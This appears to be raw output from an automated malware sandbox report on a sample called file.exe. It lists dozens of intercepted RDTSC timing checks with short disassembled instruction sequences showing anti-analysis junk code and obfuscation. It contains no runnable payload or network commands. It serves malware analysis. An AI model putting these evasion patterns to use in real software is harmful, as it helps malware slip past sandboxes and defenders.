              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CCDF9 second address: 3CCE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3B605222C6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F3B605222C6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CD0EC second address: 3CD0F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CD64A second address: 3CD656 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F3B605222C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CD656 second address: 3CD65E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CD65E second address: 3CD662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CD662 second address: 3CD666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CD794 second address: 3CD7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jmp 00007F3B605222D0h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CD7AB second address: 3CD7B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CD7B1 second address: 3CD7B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CD950 second address: 3CD956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CD956 second address: 3CD966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F3B605222C6h 0x0000000a js 00007F3B605222C6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7EC5 second address: 3D7F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F3B60BFE529h 0x0000000a push eax 0x0000000b jmp 00007F3B60BFE528h 0x00000010 pop eax 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F3B60BFE51Dh 0x00000018 jmp 00007F3B60BFE51Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F3B60BFE523h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D66DA second address: 3D66DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D66DE second address: 3D670B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3B60BFE51Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F3B60BFE526h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D670B second address: 3D6713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D68E4 second address: 3D68E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D68E8 second address: 3D6915 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222D7h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3B605222D2h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D6A97 second address: 3D6A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D6A9D second address: 3D6AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D6AA1 second address: 3D6AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D6D67 second address: 3D6DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F3B605222C6h 0x0000000c popad 0x0000000d jnp 00007F3B605222D2h 0x00000013 jc 00007F3B605222C6h 0x00000019 jc 00007F3B605222C6h 0x0000001f jng 00007F3B605222CEh 0x00000025 popad 0x00000026 push ebx 0x00000027 push ecx 0x00000028 jmp 00007F3B605222D9h 0x0000002d pop ecx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D6DB4 second address: 3D6DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D70B3 second address: 3D70BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3B605222C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D70BD second address: 3D70D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3B60BFE51Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D70D5 second address: 3D70DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D70DB second address: 3D70E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D70E0 second address: 3D70E7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7248 second address: 3D7252 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3B60BFE516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7252 second address: 3D725B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D73DA second address: 3D73DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7517 second address: 3D7531 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3B605222C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push ecx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007F3B605222C6h 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D76CC second address: 3D76D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 385639 second address: 385648 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F3B605222C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 385648 second address: 38565A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 js 00007F3B60BFE528h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38565A second address: 385660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D63F4 second address: 3D6407 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3B60BFE51Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D6407 second address: 3D640D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DC683 second address: 3DC689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DC689 second address: 3DC693 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3B605222C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3997F9 second address: 39985B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE524h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add dword ptr [ebp+122D200Eh], edi 0x00000012 lea eax, dword ptr [ebp+124805CFh] 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F3B60BFE518h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 xor dh, FFFFFFABh 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F3B60BFE528h 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39985B second address: 384AA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3B605222D6h 0x00000008 ja 00007F3B605222C6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F3B605222C8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov ecx, 4DA23147h 0x00000033 call dword ptr [ebp+122D2BB4h] 0x00000039 push edx 0x0000003a pushad 0x0000003b jmp 00007F3B605222CEh 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39993D second address: 39994E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3B60BFE518h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 399D13 second address: 399D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 399D17 second address: 399D1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 399D1B second address: 399D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 399D21 second address: 399D49 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3B60BFE525h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F3B60BFE51Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 399D49 second address: 399D4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 399D4E second address: 399D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 399E65 second address: 399E69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 399F6F second address: 399F8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE51Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 399F8C second address: 399F92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39A030 second address: 39A036 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39A036 second address: 39A03D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39A893 second address: 39A8AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B60BFE51Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F3B60BFE516h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39AB43 second address: 39AB47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39AB47 second address: 39AB4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39AB4D second address: 39AB62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F3B605222C8h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39AB62 second address: 39AB68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39AB68 second address: 39ABC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F3B605222C8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push edx 0x00000024 pop ecx 0x00000025 push ebx 0x00000026 mov edi, dword ptr [ebp+122D3868h] 0x0000002c pop edi 0x0000002d lea eax, dword ptr [ebp+12480613h] 0x00000033 je 00007F3B605222CCh 0x00000039 or edx, 274E6241h 0x0000003f nop 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F3B605222CEh 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39ABC2 second address: 39ABCF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3B60BFE516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39ABCF second address: 39ABF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B605222CFh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3B605222CBh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39ABF3 second address: 39AC09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3B60BFE51Eh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39AC09 second address: 39AC54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b sub ch, FFFFFFDDh 0x0000000e mov edi, dword ptr [ebp+122D3924h] 0x00000014 lea eax, dword ptr [ebp+124805CFh] 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F3B605222C8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jnl 00007F3B605222C8h 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39AC54 second address: 39AC5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39AC5A second address: 385639 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3B605222C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F3B605222C8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 movsx edx, si 0x0000002c call dword ptr [ebp+1245848Dh] 0x00000032 pushad 0x00000033 push ebx 0x00000034 jmp 00007F3B605222CFh 0x00000039 pop ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F3B605222D1h 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 399D45 second address: 399D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DBB86 second address: 3DBB98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 jo 00007F3B605222E8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DBE39 second address: 3DBE5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F3B60BFE521h 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jne 00007F3B60BFE516h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DBF75 second address: 3DBF7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DBF7E second address: 3DBF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DBF82 second address: 3DBF86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E0740 second address: 3E0744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E0744 second address: 3E0765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F3B605222D9h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E0CA8 second address: 3E0CB2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3B60BFE516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E0E38 second address: 3E0E43 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E1140 second address: 3E1146 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E1146 second address: 3E114C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E114C second address: 3E1150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E12D1 second address: 3E12E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B605222CBh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E12E1 second address: 3E12ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 js 00007F3B60BFE516h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E12ED second address: 3E1308 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3B605222D0h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E1308 second address: 3E130C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E148E second address: 3E1492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E1492 second address: 3E1496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E44F9 second address: 3E450F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222CCh 0x00000007 jnl 00007F3B605222C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E450F second address: 3E4519 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3B60BFE52Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E61D0 second address: 3E61D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E8C47 second address: 3E8C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B60BFE526h 0x00000009 ja 00007F3B60BFE516h 0x0000000f popad 0x00000010 jmp 00007F3B60BFE528h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E8C80 second address: 3E8C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F3B605222CFh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E8C95 second address: 3E8C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 365AD8 second address: 365ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EA83A second address: 3EA847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3B60BFE516h 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EA847 second address: 3EA857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jng 00007F3B605222C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EEEA2 second address: 3EEEA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EEEA7 second address: 3EEEB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3B605222C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
